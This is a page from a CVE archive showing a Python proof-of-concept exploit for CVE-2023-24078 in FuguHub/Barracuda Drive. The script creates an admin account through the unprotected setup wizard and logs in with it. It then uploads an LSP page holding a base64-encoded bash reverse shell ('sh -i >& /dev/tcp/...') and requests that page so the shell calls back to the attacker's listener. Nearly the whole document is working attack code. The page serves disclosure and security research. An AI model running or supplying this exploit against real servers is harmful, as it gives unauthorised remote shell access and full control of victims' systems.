4837 Total CVEs
26 Years
GitHub
Home / 2023 / CVE-2023-24078
README.md
Rendering markdown...
POC / CVE-2023-24078.py PY
⬇ Raw GitHub ✕ Close 
import requests
import argparse
import base64
import sys

# Surpress SSL Warnings
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


# Custom usage message
usage_message = '''\
usage: python3 CVE-2023-24078.py [-h] -lh LHOST -lp LPORT -th RHOST -tp RPORT 

A PoC script for exploiting CVE-2023-24078.

Required arguments:
  -lh LHOST, --lhost LHOST      Listening Host
  -lp LPORT, --lport LPORT      Listening Port
  -th RHOST, --rhost RHOST      Target Host IP
  -tp RPORT, --rport RPORT      Port of the target 
'''

parser = argparse.ArgumentParser(description="Exploit PoC for CVE-2023-24078 - FuguHub/Barracuda Drive",
                                 usage=usage_message,
                                 formatter_class=argparse.ArgumentDefaultsHelpFormatter)


# Listening host and port
parser.add_argument("-lh", "--lhost", required=True, action="store", help="Listening Host")
parser.add_argument("-lp", "--lport", required=True, action="store", type=int, help="Listening Port")

# Target host and port
parser.add_argument("-th", "--rhost",required=True, action="store", help="Target Host IP")
parser.add_argument("-tp", "--rport", required=True, action="store", help="Port of the target")



#Default options for user creation
username = 'admin'
password = 'admin'
email = '[email protected]'

args = parser.parse_args()
parser.parse_args(args=None if sys.argv[1:] else ['--help'])

LPORT = args.lport
LHOST = args.lhost
URL = args.rhost
RPORT= args.rport

def register_admin_account(base_url, username, password, email):
    registration_url = f"{base_url}/Config-Wizard/wizard/SetAdmin.lsp"
    session = requests.Session()
    
    # Prepare the data for posting
    data = {
    'email': email,
    'user': username,  # Changed from 'admin_username' to 'user'
    'password': password,
    'password2': password,  # Changed from 'confirm_password' to 'password2'
    'recoverpassword': 'on',  # Assuming this should be kept based on the checkbox being checked by default
    }

    try:
            # Attempt to register the admin account with SSL verification disabled
            response = session.post(registration_url, data=data, verify=False)

            # Check the response to see if the registration was actually successful
            if "Account Created" in response.text:  # Replace with actual success message if different
                print(f"Successfully set admin account with username: {username} and password: {password}")
            else:
                print(f"Failed to set admin account. Status Code: {response.status_code}")
                #print("Response text:", response.text)
    except requests.exceptions.SSLError as e:
            print(f"SSL Error encountered: {e}")

base_url = f"https://{URL}:{RPORT}"

register_admin_account(base_url, username, password, email)

def login(base_url, username, password):
    login_url = f"{base_url}/rtl/protected/wfslinks.lsp"
    session = requests.Session()

    session.get(login_url, verify=False)
    
    login_data = {
        'ba_username': username,
        'ba_password': password,
    }
    response = session.post(login_url, data=login_data, verify=False)

    # Attempt to login
    if response.status_code == 200:
        print(f"Successfully logged in as {username}")
        
        return session
    else:
        print(f"Failed to log in as {username}. Status Code: {response.status_code}")
        return None

session = login(base_url, username, password)

def generate_and_create_payload_file(lhost, lport):
    # Generate base64 encoded payload
    lua_command = f"sh -i >& /dev/tcp/{lhost}/{lport} 0>&1"
    encoded_payload = base64.b64encode(lua_command.encode()).decode()

    # Create payload file content and add the base64 encoded payload 
    payload_content = f'''<div style="margin-left:auto;margin-right: auto;width: 350px;">
<div id="info">
<h2>Lua Reverse Shell</h2>
<p>CVE-2023-24078</p>
</div>

<?lsp if request:method() == "GET" then ?>
   <?lsp os.execute("echo {encoded_payload} | base64 -d | bash") ?>
<?lsp else ?>
   You sent a <?lsp=request:method()?> request
<?lsp end ?>

</div>'''

    # Write to file
    with open("rev.lsp", "w") as file:
        file.write(payload_content)

    return encoded_payload

# Usage
payload = generate_and_create_payload_file(LHOST, LPORT)

import requests

def upload_payload(session, base_url, payload_file_path):
    upload_url = f"{base_url}/fs/"

    # Prepare the file data as multipart/form-data
    with open(payload_file_path, 'rb') as file:
        files = {'file': ('rev.lsp', file, 'application/octet-stream')}
        response = session.post(upload_url, files=files, verify=False)

    # Check the response
    if response.status_code == 200:
        print("Payload uploaded successfully")
    else:
        print(f"Failed to upload payload. Status Code: {response.status_code}")

upload_payload(session, base_url, "rev.lsp")

def execute_payload(session, base_url, payload_file):
    execute_url = f"{base_url}/{payload_file}"

    response = session.get(execute_url, verify=False)

    if response.status_code == 200:
        print(f"Payload executed. Check your listener for a shell")
    else:
        print(f"Failed to execute payload. Status Code: {response.status_code}")

payload_file = "rev.lsp"
execute_payload(session, base_url, payload_file)